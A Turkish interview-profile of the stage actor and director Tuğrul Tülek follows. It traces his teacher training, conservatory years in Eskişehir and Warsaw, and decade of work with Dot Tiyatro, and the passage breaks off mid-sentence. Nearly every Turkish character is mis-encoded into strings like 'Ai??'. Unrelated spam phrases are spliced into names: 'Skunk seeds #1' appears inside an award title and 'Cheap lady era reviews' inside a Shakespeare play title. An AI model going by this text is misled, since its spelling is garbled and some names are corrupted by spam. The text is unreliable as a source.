Ai??yi AYeyler yapmanAi??n iAi?? rahatlAi??AYAi??, dingin yA?zA?nA? aydAi??nlatAi??yor. Kendiyle barAi??AYAi??k olanlarAi??n gAi??zleri bAi??yle Ai??AYAi??klAi?? bakar ancak. Ai??nsan olmanAi??n erkenci yolcusu o. Evet efendim, incelikler de bu dA?nyaya ait. ai???Hassasai??? ne gA?Ai??lA? bir kelime! GA?lA?msemek, teAYekkA?r etmek, tebrik etmek, empatiyle yaklaAYmak, AYAi??marmayan sevincini mahcubiyetinin iAi??ine gizlemekai??i?? Bunlar, vicdanlAi?? kalplerin Ai??iAi??ek aAi??tAi??rmasAi?? naifliAYin can Ai??ekiAYtiAYi bugA?ne. Hediye gibi! ZorbalAi??klarla dolu bu berbat, tesellisiz zamanlarAi??n ilacAi??, avuntusu, can suyu…

Bundan bAi??yle, yA?zA?mA?ze bir gamze gibi yerleAYecek izden tanAi??yacaAYAi??z birbirimizi, gizil Ai??rgA?tlerin parolasAi?? gibi sanatAi?? fAi??sAi??ldayarak bulacaAYAi??z yAi??nA?mA?zA?. Ai??oAYalacaAYAi??z. ai???Ahai??? diyeceAYiz sonraai??i?? ai???Ya tanAi??masaydAi??m seniai???ai??i?? Der demez susacaAYAi??z. TanAi??madAi??AYAi??mAi??z gA?nlerin hayAi??flanmasAi??ndan vazgeAi??eceAYiz, yAi??lgAi??nlAi??k yasak! CA?mlelerimiz ai???iyi kiai??i??ai???lerle baAYlayacak yine.Ai??

GA?zel insanlarAi??n, gA?zel AYeyler yapmadaki inatlarAi??na hayranAi??m. Tutkulu bir tiyatro izleyicisi olmam onlar sayesinde ve yetenekleriyle sevdiAYim bu insanlarAi??n sAi??AYAi??naklarAi?? kadar korunaklAi?? bir yer daha bilmiyorum ben! Oh, dA?nya gA?zelai??i?? Ben bu yAi??rA?ngede kalayAi??m.

DilediAYi gibi yaAYayanlarAi??n Ai??ekiciliAYi var onda. Sadece sempatik demekle anlatAi??lmAi??yor. YeryA?zA?ndeki en tuhaf rollerin adamAi??. AdAi?? henA?z konmamAi??AY, kendisinin tA?rettiAYi mimikleri var. Hepsini de yA?zA?ne sAi??AYdAi??rabilmiAY. Tiyatroda oynuyor, yAi??netiyor, Ai??eviriyor, uyarlAi??yor. OrasAi?? Ai??zgA?rlA?k alanAi??, A?zerinde dolaAYAi??rken gAi??zA? pek. Hep cesur iAYlerin iAi??inde olmak istiyor. Bu yamanlAi??k tam ona gAi??re. BaAYlarda Dot Tiyatro ile anAi??lAi??yor. Sonra onu izlemek iAi??in Dotai??i??a gelenler oluyor. MA?ptelasAi?? Ai??ok. Ekip iAi??inde Ai??oAYulcu adAi??mlara uygun yA?rA?meyi iyi biliyor ama o ai???TuAYrul TA?lekai??? olarak kAi??ymetli, aranan biri. BaAYka oluAYumlara da omuz Ai??Ai??kAi??yor, onlarAi?? da sahipleniyor. Sinemada oynuyor, ortak yAi??nettiAYi bir kAi??sa filmi var. Senaryo yazAi??yor, hep bir kenara notlar alAi??yor. Dizilerden, reklamlardan -ve neden olmasAi??n- klipten gAi??z kAi??rpAi??yor bize. Ai??ocuklarAi??, onlarla Ai??alAi??AYmayAi?? seviyor. Onlardan, Ai??AYrettiAYinin fazlasAi??nAi?? Ai??AYreniyor. Ai??AYrenmeye meraklAi??. Korkusuz. BaAYtan baAYlamaktan hele, hiAi?? korkmuyor! Enerjik. Bir yerde fazla duracak gibi gAi??rA?nmA?yor. YaAYanacak onca AYey varken oyalanmak istemiyor. KeAYfedilecekler listesi kabarAi??k. HiAi??bir AYeyi, ucundan tutarak yapmAi??yor. Muzip, yaratAi??cAi??; sAi??radanlAi??k yaAYamAi??nAi??n dAi??AYAi??nda, onunla anAi??lacak AYey deAYil! EAYleniyor. KulaAYAi??ndaki melodiler Ai??ok Ai??eAYitli, AYarkAi?? sAi??ylerken patlama gibi bir AYey oluyor. Ai??Ai??zA?mcA?, analitikai??i?? BilinAi??le kotarAi??yor iAYlerini. Kafa karAi??AYAi??klAi??AYAi?? yaAYamayan bir adamAi??n katmanlAi?? varoluAYunda kaAi?? TuAYrul tanAi??dAi??m ben!

Onu sahnede izliyorum, sonra ne gA?zel bir gA?n diyorum. Onunla gurur duyanlar listesine kendimi de ekliyorum. Yoluna, hayatAi??n hazAi??rladAi??AYAi?? gA?zellikler Ai??Ai??ksAi??n, onlara da mucizeler eAYlik etsin istiyorum.

Konservatuvardan Ai??nce UludaAY A?niversitesi Ai??ngilizce Ai??AYretmenliAYi BAi??lA?mA?ai??i??nde okusan da tiyatroyla baAYAi??n var, okulun tiyatro grubuna giriyorsun. Daha sonra, Bursa KA?ltA?r Sanat ve Turizm VakfAi?? Tiyatrosuai??i??nda bir oyunculuk ai???workshopai???una katAi??lAi??yorsun. Ai??zer Tuncaai??i??nAi??n dikkatini Ai??ekiyorsun, seni aklAi??na yazAi??yor ve bir sene sonra sahneleyeceAYi oyunda sana rol teklif ediyor. Yine 1997ai??i??de GA?lriz Sururi de seni ai???KeAYanlAi??ai??? seAi??melerinde hemen fark ediyor ve iAYte ai???Ai??zmarit Nuriai??? diyor. Seni ilk keAYfedenlerden.
Evet, okulun bir tiyatro kulA?bA? var. Bir de biz, EAYitim FakA?ltesi olarak, Tiyatro AtAi??lyesi diye bir oluAYuma giriAYtik bir hocamAi??zAi??n Ai??nderliAYinde. Orada oynadAi??AYAi??mAi??z oyunlardan birisi de ai???KeAYanlAi?? Ali DestanAi??ai???. Ai??Hatta GA?lriz Hocaai??i??yla da tanAi??AYmam yine o zamana denk gelir. O oyunu, Ai??zer Tunca izliyor. Onun da koyacaAYAi?? bir oyun var ai???KA?l Kedisiai??? diye. Benim de ai???auditionai???a girmemi istiyor. Ben o ara mezun olmuAYum fakat ingilizce Ai??AYretmeni de olmak istemiyorum. Ne yapacaAYAi??mAi?? da bilemiyorum derken, karAYAi??ma bir anda bAi??yle bir AYey Ai??Ai??kAi??nca da tabii ki Ai??ok hoAYuma gitti. Okuma yaptAi??k, Ai??zer abi ai???tamamai??? dedi. Ben inanamAi??yorum, tiyatro oyununda oynayacaAYAi??m. BAi??ylece o zamanki adAi?? Bursa KA?ltA?r Turizm VakfAi?? olan ekibin iAi??inde tiyatroya baAYladAi??m. Oyunculuk okulu anlamAi??nda bana Ai??ok AYey Ai??AYreten ilk kurum orasAi??. Orada Ai??ok gA?zel bir Ai??alAi??AYma sistemi vardAi??. Her oyun Ai??ncesi oyunla ilgili birtakAi??m ai???workshoplarai??? yapAi??lAi??rdAi??. Ahmet AvkAi??ranai??i??la Ai??alAi??AYmalar yapmaya baAYlamAi??AYtAi??k. Kendisi Mustafa AvkAi??ranai??i??Ai??n kardeAYi, yAi??llarca Ai??talyaai??i??da ai???clownai??? eAYitimi almAi??AY, konusunda gerAi??ekten uzman ve Ai??ok baAYarAi??lAi?? biri. Burada bu Ai??alAi??AYmalar sayesinde bir oyunun ai???backstageai???ini, hazAi??rlAi??k aAYamasAi??nAi??, mutfaAYAi??nAi?? daha iyi algAi??ladAi??m. Ai??ncesinde okulda yaptAi??AYAi??mAi??z, hevesli arkadaAYlar ile bir araya gelip ister istemez el yordamAi??yla yaptAi??AYAi??mAi??z bir AYeydi ama burada gerAi??ekten anlamaya baAYladAi??m. O Ai??ok keyifli bir araAYtAi??rma sA?reciydi ve Ai??ok AYey Ai??AYretti. LabaratuvarAi?? daha iyi anladAi??m oyunlarla birlikte. Ai??ocuk oyunu geAi??miAYinden gelmekten Ai??ok bA?yA?k onur duyuyorum. Oyunu sahnelemekten, -neden olmasAi??n- tekrar oynamaktan keyif alAi??yorum. Tiyatro Ai??ok Ai??nemli ama Ai??ocuk tiyatrosunun, Ai??ocuklara yapAi??lan tiyatronun daha da Ai??nemli olduAYunu dA?AYA?nA?yorum. O zihinleri, o beyinleri, o algAi??larAi?? siz Ai??ok Ai??nemli bir misyona sahip olarak aslAi??nda deAYiAYtirmeye ya da geliAYtirmeye Ai??alAi??AYAi??yorsunuz. 1999-2002 yAi??llarAi?? arasAi??nda orada 3-4 sezon, ai???MidasAi??n KulaklarAi??ai???nAi??, ai???SoytarAi??larai???Ai?? ve ekip iAi??inde yazAi??lAi??p Ai??izilen baAYka oyunlarAi?? oynadAi??m. Ve tA?m bu sA?reAi?? iAi??inde Ahmetai??i??le Ai??alAi??AYmalarAi??mAi??z sA?rdA? mutlaka oyunlarla ilgili. AyAYe Emel Mesci ile Ai??alAi??AYtAi??m o dAi??nemde. Hatta benim ortak yazarlAi??AYAi??nAi?? yaptAi??AYAi??m oyunlardan birini yAi??netmek A?zere geldiAYi sene, ben konservatuvarAi?? kazandAi??m. Oyunun Ai??ncesinde bir sA?re Ai??alAi??AYabildik birlikte, sonra ben vedalaAYtAi??m ekiple. Daha sonra AyAYe Emel Mesci hocam olarak konservatuvara gelince Ai??ok mutlu oldum. Okulda yeniden Ai??alAi??AYma AYansAi??mAi??z oldu. BA?tA?n bu isimler o yA?zden benim iAi??in Ai??ok Ai??nemli. O zamanki Bursa KA?ltA?r Sanat Tiyatrosu Ai??ok deAYerliydi, bana Ai??ok faydasAi?? oldu, ufkumu aAi??tAi??.

Ne gA?zel bir tesadA?f ki yAi??llar sonra Sadri AlAi??AYAi??k A?stA?n Performans Ai??dA?lA?ai??i??nA? de yine GA?lriz Sururiai??i??nin elinden alAi??yorsun.
RA?ya gibi. Hayat bazen Ai??ok tuhaf AYeyler getiriyor karAYAi??nAi??za. Ai??ocukluAYunuzda hayran olduAYunuz biri var. Sonra bir gA?n onunla karAYAi??laAYAi??yorsunuz. Sonra bir gA?n onunla aynAi?? mesleAYi yapmaya baAYlAi??yorsunuz. Sonra onun, sizin oyunlarAi??nAi??zAi??, kariyerinizi bir AYekilde takip ettiAYini biliyorsunuz, gelip oyunlarAi??nAi??zAi?? izliyor ve bu size Ai??ok bA?yA?k bir gurur veriyor. Ve sonra bir gA?n, onun elinden Ai??dA?l alAi??yorsunuz. Ai??dA?lA? verirken de bizim hikayemizi anlatAi??yor falan… DA?AYA?ndA?AYA?nA?z zaman bAi??yle, rA?ya gibi bir AYey hissettim. Benim iAi??in Ai??ok bA?yA?lA? bir andAi?? o. UmarAi??m yolumda bAi??yle anlar daha da vardAi??r hayatAi??n hazAi??rladAi??AYAi??.

Sonra 2002 yAi??lAi??ndaAi??EskiAYehir Anadolu A?niversitesiAi??TiyatroAi??BAi??lA?mA?’nde ikinci lisans eAYitimine baAYlAi??yorsun.
Ben konservatuvar okumaya karar verdiAYimde 26 yaAYAi??ndaydAi??m ve yaAY sAi??nAi??rAi??ndan dolayAi?? her okula baAYvuramAi??yordum. Sadece Dil Tarih CoAYrafya ve EskiAYehir Anadolu A?niversitesiai??i??nde yaAY sAi??nAi??rAi?? yoktu. Ben tek tercih olarak EskiAYehirai??i??i seAi??tim. Tek atAi??mlAi??k kurAYunum vardAi??. Yani ya kazanAi??p o okulu okuyacaAYAi??m ya da olmayacak ama en azAi??ndan denemiAY olacaAYAi??m. Olmazsa da muhtemelen Bursa KA?ltA?r Sanat VakfAi?? Tiyatrosuai??i??nda devam edeceAYim. Kendime rahat ol, bu senin hayatAi??nAi??n sonu deAYil, senin zaten bir mesleAYin var, kaybedeceAYin bir AYey yok, en kAi??tA? ihtimalle yine hayatAi??na devam edersin dedim ve o bilinAi??le girdim sAi??navlara. Galiba bu beni Ai??ok rahatlattAi?? ama tabii sAi??navAi?? Ai??nemsemedim diye bir AYey anlaAYAi??lmasAi??n bundan; aksine Ai??ok Ai??alAi??AYtAi??m. EskiAYehirai??i??de iki gA?n boyuca dans, AYan, doAYaAi??lama, ses, diksiyon, sahne gibi bir sA?rA? aAYamadan geAi??iyorsunuz. Ve nihayetinde oldu ve tabii Ai??ok mutlu oldum. Bu Ai??ok tuhaf bir his, belli bir yaAYta, tam hayatAi??nAi??za bir yAi??n vermiAYken, her AYey bir anda deAYiAYiyor ve her AYeye baAYtan baAYlAi??yorsunuz. Burada ingilizce Ai??AYretmenliAYinin faydasAi??nAi?? Ai??ok gAi??rdA?m. Ai??A?nkA? o yaAYta birinin, baAYka bir AYehirde, ailesinden para alarak Ai??AYrencilik yapmasAi?? fikri bana gAi??re deAYildi. Bunu ben kendim halledeceAYim; halledemezsem de geri dAi??neceAYim dedim. O yA?zden kayAi??t yaptAi??rmadan Ai??nce, burada iAY bulabilecek miyim bulamayacak mAi??yAi??m ona baktAi??m. EskiAYehirai??i??de Ai??nA?me gelen her dil kursuna CV bAi??raktAi??m. AltAi??nAi?? Ai??izmek istediAYim AYAi??yle bir durum var. TA?rkiyeai??i??de okumak isteyen, yoluna ikinci, A?Ai??A?ncA? eAYitimini alarak devam etmek isteyenlerin karAYAi??laAYacaAYAi?? engel AYu: Ai??AYretim harcAi??nAi??n iki katAi??nAi?? Ai??dA?yorsunuz. Bazen mucizeler dokunuyor size. BaAYvuru yaptAi??AYAi??m kurumlardan biri, ertesi gA?n bana geri dAi??ndA? ve hemen o gA?n gidip kaydAi??mAi?? yaptAi??rdAi??m. Ve sonrasAi??nda hem hocalAi??k yaptAi??m hem Ai??AYrencilik yaptAi??m hem de hiAi??bir AYeyden geri kalmadAi??m.

ai???Ai??nsanAi??, insana, insanca anlatmaai???ai??i?? diye baAYlayan cA?mlelerin kurulduAYu geleneksel bir yapAi??dasAi??n artAi??k. 2006 yAi??lAi??nda mezun olmadan son sene Erasmus Ai??AYrenci deAYiAYim programAi??yla VarAYova, Polonya‘daAi??Akademia Teatralna im Aleksandra ZalwerowiczaAi??oyunculuk okulunda da eAYitim alAi??yorsun.
Konsevatuvarda Ai??aAYdaAY yazarlardan baAYlayAi??p klasiklere gitmenin daha doAYru olduAYunu dA?AYA?nA?yorum. Ben kendi Ai??AYrencilerimle ders yaparken de bunu gAi??zetmeye Ai??alAi??AYtAi??m. Daha bildik, daha tanAi??dAi??k bir hikayenin iAi??ine sokup yavaAY yavaAY daha evrensel ve klasik hikayelere gitmenin daha doAYru ve mantAi??klAi?? olduAYunu dA?AYA?nA?yorum. Ai??ok bA?yA?k tekstlerai??i??i, Ai??ehovai??i??larAi??, Shakespeareai??i??leri daha elimizi kolumuzu nereye koyacaAYAi??mAi??zAi?? bilmeden, Ai??AYrenmeden, hakkAi??nAi?? veremeden Ai??alAi??AYmak bazen de geri tepiyordu. Ben belki 26 yaAYAi??nda olduAYum iAi??in sAi??ylenenleri Ai??ok da umursamazdAi??m, daha Ai??ok kendi bildiAYimi okurdum ama daha kA?Ai??A?k yaAYta konservatuvar eAYitimi almAi??AY olsaydAi??m, pek Ai??ok sAi??nAi??f arkadaAYAi??m gibi zarar gAi??rebilirdim. Evet Shakespeareai??i??ler okuduk, oynadAi??k ama iAY kendi tercihlerimize geldiAYinde sevdiAYimiz, daha kendi rengimizi belli edeceAYimiz oyunlarAi?? tercih ettim hep. Ai??AYte Harold Pinterai??i??lar, Tennessee Willamsai??i??lar, Peter Schafferai??i??ler oldu. Tabii o dAi??nemde hele EskiAYehirai??i??de Mark Ravenhillai??i??lere, Philippe Ridleyai??i??lere getiremiyorsunuz. Yine de Jean Genetai??i??leri, Tankred Dorstai??i??larAi?? olabildiAYince oynamaya Ai??alAi??AYtAi??k. Okulda Arthur Millerai??i??Ai??n ai???CadAi?? KazanAi??ai???nAi?? oynadAi??m. Moliereai??i??in ai???Tartuffeai???unu oynadAi??m. Proje dersinde kendi seAi??tiAYimiz oyunu oynuyorduk, biz bir arkadaAYAi??mla David Mametai??i??in ai???Oleannaai???sAi??nAi?? oynadAi??k. Yoksa o bize okulda Ai??nerilen bir yazar deAYildi. Azimdi artAi??k Ai??aAYdaAY yazarlara ulaAYmak daha kolay. Konservatuvar sAi??navlarAi??nda jA?riler genelde zorunlu parAi??alarda kendi bildikleri sularda yA?zmek istedikleri iAi??in Ai??yle parAi??alar isterler. OnlarAi??n da biraz yenilemesi gerektiAYine inanAi??yorum. Kelimenin bize hatAi??rlattAi??AYAi?? her tA?rlA? anlamdan uzakta bir eAYitime geAi??mek durumundayAi??z diye dA?AYA?nA?yorum.

KA?rklA? MerkA?r / Dot

Bu oyunlarAi?? oynaman iyi olmuAY Ai??A?nkA? sonrasAi??nda klasikler yerine; Ai??aAYdaAY tiyatronun en gA?ncel metinlerini takip etmek isteyen Dot seyircilerine, cesur, hatta cA?retkA?r oyunlar oynayacaksAi??nai??i??Ve cesur iAYlerin iAi??inde yer almak kadar haz veren bir AYey yok sana. Okul, askerlik bitince, 31 yaAYAi??ndayken Bursaai??i??da gazetede Dotai??i??un 30 yaAY altAi??nda oyuncu aradAi??AYAi?? haberini okuyorsun ve bunu bir iAYaret kabul edip oyuncu seAi??melerine katAi??lmamaya karar veriyorsun Ai??nce. Ama sonra CVai??i??inde yaAYAi??nAi?? kA?Ai??A?ltA?p seAi??melere katAi??lAi??yorsun ve ai???KA?rklA? MerkA?rai??? Naz rolA?yle serA?ven baAYlAi??yor.
Ben son sene VarAYovaai??i??ya gittim. Orada ai???Hamletai???Ai??ve ai???The Water Henai???i oynadAi??m. Sonra geri dAi??ndA?m. Askere gitmem gerekiyordu Ai??A?nkA? ikinci lisans eAYitimi alAi??yorsanAi??z askerlik tecil edilmiyor. Yani ikinci A?niversiteyi okumamanAi??z iAi??in her tA?rlA? AYeyi yapAi??yorlar. Neyse, 31 yaAYAi??ndaydAi??m, ne yapacaAYAi??mAi?? bilmiyordum. Galiba daha gA?venli sularda olmak istiyorum deyip Bursaai??i??da hem eski ekibe, hem de daha Ai??nce Ai??alAi??AYtAi??AYAi??m dil kursuna geri dAi??ndA?m. O ekibin de adAi?? ve iAi??eriAYi deAYiAYmiAY ve belediyeye baAYlAi?? hale gelmiAYti. Orada ai???Deli Dumrulai???u oynayacaAYAi??z. AnlaAYtAi??k, sAi??zleAYmemizi imzaladAi??k, bayaAYAi?? sigortalAi?? bir Ai??alAi??AYan olacaAYAi??m derken bahsettiAYin gazete ilanAi??nAi?? gAi??rdA?m. Hem yaptAi??AYAi??mAi??z anlaAYma, hem yaAYAi??mAi??n istenilenden bA?yA?k olmasAi?? bana kabul etmemem iAi??in gAi??rA?nen iki iAYaret gibi geldi baAYta. Ben de Bedir Bedirai??i??i aradAi??m. SakAi??n ai???auditionai???Ai?? kaAi??Ai??rma dedim. Sonra iAYler tersine dAi??ndA? dediAYin gibi. Madem birlikte Ai??alAi??AYAi??yoruz, hazAi??rlanAi??yoruz o kadar, bari ben de gireyim seAi??melere, zaten yaAYAi??mdan da kA?Ai??A?k gAi??steriyorum, onu da biraz kA?Ai??A?lteyim dedim. Ve sAi??nava girmeye karar verdim. Sonra Dot olumlu biAi??imde geri dAi??ndA?. O zaman Dot, MAi??sAi??r ApartmanAi??ai??i??ndaydAi??. Gittim, konuAYtuk, Ai??alAi??AYmak istediklerini sAi??ylediler. ai???Ben bir dAi??AYarAi?? Ai??Ai??kabilir miyimai??? dedim. Ai??Ai??ktAi??m. Ai??stiklal Caddesiai??i??ni boydan boya iki kere yA?rA?dA?m. ai???Azimdi Ai??stanbulai??i??a geleceksin, ne olacak, ne kadar paran var, ne yaparsAi??n, nerede ev tutarsAi??n, gelsem mi, gelmesem mi, evet mi desem, hayAi??r mAi?? desemai??i?? Ama bak girdin sAi??nava ve oldu, bak bu da bir iAYaret, bu AYans senin karAYAi??na bir daha Ai??Ai??kmaz, sen bunu yap, baktAi??n ki olmuyor geri dAi??nersinai???ai??i?? Kafamda dA?AYA?nceler Ai??arpAi??AYAi??yor. AblamAi?? aradAi??m, o da tabii ki git dedi. Bir yandan seviniyorum, bir yandan hiAi??bir AYey hazAi??r deAYil hayatAi??mda. Neyse sonuAi??ta geldim, bir arkadaAYAi??mAi??n evine yerleAYtim. Yine gelir gelmez bir okulda Ai??AYretmenlik ayarladAi??m.

Ai??AYretmenlik sana tiyatro yolculuAYun boyunca hep destek Ai??Ai??kAi??yor.
O yA?zden hep iyi ki o bAi??lA?mA? okumuAYum dedim sonrasAi??nda. Benim hayatAi??mAi?? hep kurtardAi??.

BAi??ylece o gA?ne kadar okuduAYun, oynadAi??AYAi??n hiAi??bir oyuna benzemeyen, riskli ama bugA?n bakAi??ldAi??AYAi??nda kA?lt olmuAY bir oyunda yer aldAi??n ve kendi yolculuAYunu baAYlattAi??n. Ya yanlAi??AY iAYareti takip etseydin! YeteneAYini bAi??yle Ai??ok yAi??nlA? sergileyeceAYin, hatta keAYfedeceAYin bir baAYka tiyatro olur muydu? Ya Ai??denekli tiyatroda baAYlasaydAi??n Ai??rneAYin!
HiAi?? Ai??denekli tiyatrolarda Ai??alAi??AYmayAi?? dA?AYA?nmedim. Ben tabii ki evvelinde Dotai??i??u takip ediyordum. Ai??ncesinde oynadAi??klarAi?? ai???Frozenai??? vardAi??, ai???BAi??cekai??? vardAi??. Ama ai???KA?rklA? MerkA?rai??? ile iyi bir ivme kazandAi?? Dot. ai???KA?rklA? MerkA?rai??? hem bireysel olarak benim iAi??in, hem kurumsal olarak Dot iAi??in, hem de izleyici iAi??in Ai??ok baAYka bir yerde duran bir oyun oldu. AslAi??nda Dotai??i??u Dot yapan oyunlardan bir tanesi. Bu elbette karAYAi??lAi??klAi?? ve birlikte yarattAi??AYAi??mAi??z bir AYey. O yA?zden de zaten uzun yAi??llardAi??r birlikte Ai??alAi??AYAi??yoruz. Ben de aynAi?? AYeyi dA?AYA?nA?yorum. O konuda Ai??ok AYanslAi?? olduAYumu dA?AYA?nA?yorum Ai??A?nkA? Dot hem istediAYim gibi tiyatro yapmam iAi??in bir alan aAi??tAi?? bana, hem de tabii ki popA?ler bir tiyatro olduAYu iAi??in de kAi??sa sA?rede Ai??ok fazla insanla tanAi??AYmamAi??, Ai??ok fazla insanAi??n beni izlemesini saAYlamAi??AY oldu. O anlamda ben o yaAY dezavantajAi??nAi?? bir AYekilde avantaja Ai??evirdiAYimi ve Ai??ok kAi??sa sA?rede mesafe kat ettiAYimi dA?AYA?nA?yorum. Dot, sadece oyunculuk olarak deAYil; tiyatro insanAi?? olarak da Ai??ok fazla farkAi??ndalAi??k oluAYturdu kafamda.

Bu rol sana, 12. Afife Tiyatro Ai??dA?lleri‘nde “YardAi??mcAi?? Rolde En Ai??yi Erkek Oyuncu” adaylAi??AYAi?? getirdi. AynAi?? yAi??l tA?mAi??ai???KA?rklA? MerkA?rai??? oyuncularAi??ylaAi??Sadri AlAi??AYAi??k Tiyatro Ai??dA?lleri Skunk seeds #1 ‘nde “Efes Pilsen GenAi??lik Ai??zel Ai??dA?lA?”nA? paylaAYtAi??nAi??z.
Biz ekip olarak Ai??ok Ai??dA?l almAi??AY bir tiyatroyuz zaten. Bu Ai??ok sevindiri bir AYey gerAi??ekten de. DoAYru ekibi, doAYru kafalarAi?? bir araya getirmek Ai??ok kolay olmuyor. Bunu gAi??rmek gA?zel.

Dot sayesinde gelenekselden gA?nA?mA?ze Ai??AYAi??nlandAi??n. Onu farklAi?? kAi??lan, o Ai??ok hissedilen ekip ruhu ve tutarlAi?? ve Ai??srarlAi?? cesareti ilk Ai??nce. OluAYturduAYu bir dil var. Biz koruyoruz bunu, yani birbirimizi korumayAi?? seviyoruz. Her ekip fAi??rtAi??nalar da yaAYar, mutedil zamanlar da geAi??irir. Ama biz her AYeyi kendi iAi??imizde yaAYamayAi?? ve halletmeyi tercih ediyoruz. Bu da, ne olursa olsun bizim daha gA?Ai??lA? durmamAi??zAi?? saAYlAi??yor. Ben bunun Ai??ok Ai??nemli olduAYunu dA?AYA?nA?yorum. Kol kAi??rAi??lAi??r yen iAi??inde kalAi??r gibi Ai??irkin bir taraftan bahsetmiyorum. Bunu hem profesyonel hem de insani olarak halledebilmekten bahsediyorum. Biz uzun yAi??llardAi??r bunu becerebiliyoruz, baAYarabiliyoruz o yA?zden de bence ekip olabiliyoruz.

En gA?zeli kimse orada diAYerine gol atma derdinde deAYil.
Bu kadar zamandan sonra, artAi??k deAYil. Ai??yle bir durum olduAYunda da doAYal seleksiyonla, yavaAY yavaAY, o gol atmaya Ai??alAi??AYanlar, korumaya Ai??alAi??AYtAi??AYAi??nAi??z alanlarAi??n dAi??AYAi??na Ai??Ai??kAi??yorlar. Biz gerAi??ekten birbirimizi koruyan kollayan bir ekibiz. Bunu seviyorum.

Sen de zaten ekip olmayAi??, Ai??alAi??AYacaAYAi??n kiAYileri baAYa koyuyorsun tercihlerinde. Tekstin sAi??ylediAYi sAi??z de Ai??nemli ama iyi oyunculuk, tekst kriterleri sonra geliyor sAi??ralamada. Ai??yi oyuncu olmak da iyi ekip elemanAi?? olmak anlamAi??na gelmiyor. Ai??Ai??zA?me yAi??nelik olmak Ai??nemli.
Kesinlikle Ai??yle. Hatta Ai??alAi??AYmak istediAYim teksti bulup da dilediAYim ekibi kuramazsam, o oluAYmazsa, o teksti baAYka bir tarihe erteleyebilirim. GerAi??ekten huzurla Ai??alAi??AYacaAYAi??mAi??z bir ekip yaratmak Ai??ok Ai??nemli. O Ai??A?nkA? iAYe Ai??ok yansAi??yan bir AYey, iAYin renginin de gA?zel olmasAi?? anlamAi??nda.

Dotai??i??ta on yAi??ldAi??r devam eden bu yolculukta, oynadAi??AYAi??n her oyun, hakkAi??nda uzun konuAYmalarAi?? haketse de bu mA?mkA?n deAYil ama belki isimlerini geAi??irebiliriz burada. Bir yazarAi?? seAi??tiniz mi bAi??rakmAi??yorsunuz genelde, birkaAi?? tekstini Ai??alAi??AYAi??yorsunuz.
Bana geriye dAi??nA?p de hangi oyunu tekrar oynamak istersin diye bir soru sorsan ai???Vur/YaAYmala/Yenidenai???deki ai???SavaAY ve BarAi??AYai??? kAi??sa oyunundaki, o kafasAi?? kopmuAY askeri oynamak isterim derim. Ai??ok severek oynadAi??AYAi??m bir oyundu. Yirmi kere falan sergiledik sadece. Tabii o kAi??sa oyunlar bizim tA?m sezon oynadAi??AYAi??mAi??z oyunlar gibi deAYil. O yA?zden de hevesim biraz kursaAYAi??mda kaldAi?? o oyunla ilgili. Onun dAi??AYAi??nda iki sezon hiAi?? ara vermeden oynadAi??AYAi??mAi??z ai???AlAi??AYveriAY ve S***AY/Shopping and Fuckingai??? var. ai???Malafaai???, ai???Supernovaai??? var. ai???Ai??ksA?zlerai???i yAi??nettim arada. Yine ai???YA?ksekai??? vardAi?? arada yAi??nettiAYim. ai???Makas OyunlarAi??ai??? var, o da yine kAi??sa oyunlar serisi. ai???DAi??vA?AY Gecesiai??? ve hA?lA? oynadAi??AYAi??m ai???Ai??ki KiAYilik Yazai??? var.

2008ai??i??de araya bir deAi??Tiyatro Temai??i??de oynadAi??AYAi??n Shakespeareai??i??in ai???III. RiAi??Ai??rd FaciasAi?? Cheap lady era reviews ai??? giriyor. O nasAi??l oluyor? SonrasAi??nda yine yepyeni soluklar getiren, hatta anlaAYAi??lmasAi??, benimsenmesi zaman alan, sarsAi??cAi??, seyirciye birden fazla soru sorduran oyunlara devam ediyorsun Dotai??i??ta.
Biz AyAYe (Selen) ve Azehsuvar (AktaAY) ile Ai??ok Ai??nceden tanAi??AYAi??yoruz. AyAYe, Bursa zamanAi??nda ai???MidasAi??n KulaklarAi??ai???nAi??n yAi??netmeniydi. Hatta Ai??stanbulai??i??a geleceAYim belli olunca ben ilk AyAYeai??i??yi arayAi??p haber verdim. O dAi??nem, ai???III. RiAi??Ai??rd FaciasAi??ai??? Ai??Ai??kmAi??AY bir oyundu. Tiyatro Tem de Bonn Bienaliai??i??ne kabul edilmiAYti. Ve fakat bir oyuncu o tarihlerde gidemiyor Bonnai??i??a. AyAYeai??i??ler bana sordular ai???oynar mAi??sAi??nai??? diye. ai???Tabii oynarAi??mai??? dedim ve koAYa koAYa gittim. Ai??lk baAYta neye evet dediAYimi bilmeden gitmiAYim Ai??A?nkA? oyunun yAi??netmeni Ai??etin SarAi??kartal! Zaten halihazAi??rda Ai??Ai??kmAi??AY olan bir oyuna dahil olmak Ai??ok zor. Hele Ai??etin SarAi??kartalai??i??Ai??n dilini anlayAi??p, oyunun uslAi??bunu anlayAi??p Ai??ok kAi??sa sA?rede hazAi??rlanmak daha da zor. Ama bana o kadar iyi geldi ki. Hep sAi??ylerim, bana kattAi??AYAi?? AYeyler Ai??-NA-NIL-MAZ. O da arada bir gA?zellik oldu benim iAi??in.

2011ai??i??de oynadAi??AYAi??n ai???Supernova/Beautiful Burnoutai???, ai???Devised Theatreai??? diye adlandAi??rAi??lan, mA?ziAYin, sporun, metnin, Ai??AYAi??AYAi??n birleAYtiAYi bir tasarAi??m-oyun. Ai??n hazAi??rlAi??AYAi??nAi??n Ai??ok uzun sA?rdA?AYA? bu oyun sana boks yapmayAi?? Ai??AYretti. Ai??ylesine deAYil; layAi??kAi??yla.
Oyun orjinalinde de atAi??lye Ai??alAi??AYmasAi??yla ortaya Ai??Ai??kmAi??AY zaten. YazarAi??n, koreografAi??n, oyuncularAi??n, yAi??netmenin bir araya gelip yaptAi??AYAi?? Ai??alAi??AYmalarla ortaya Ai??Ai??kmAi??AY bir metin. O yA?zden ai???Devised Theatreai???. FarklAi?? farklAi?? isimler bir araya gelip aslAi??nda oyunun ortaya Ai??Ai??kmasAi??nAi?? saAYlAi??yor. Yani oyunu icat ediyorlar. Oradan yola Ai??Ai??kAi??yor. Oyunun asAi??l prova sA?reci A?Ai?? ay kadar sA?rse de Ai??n hazAi??rlAi??AYAi??yla birlikte toplam iki buAi??uk sene falan sA?rdA?. Biz Ai??ok uzun bir sA?re boks dersi aldAi??k. Sonra iAYin iAi??ine dans girdi Ai??A?nkA? oyunda bir sA?rA? koreografi vardAi??. Hangi rolA? oynayacaAYAi??mAi??z belli deAYildi. Bir tek Berrak (KuAY) ve PAi??narai??i??Ai??n (TAi??re) rolleri belliydi. Bizim o sA?reAi?? iAi??erisindeki performansAi??mAi??za da dayalAi?? olarak roller yavaAY yavaAY yerlerini buldu. Yani biz de kendi 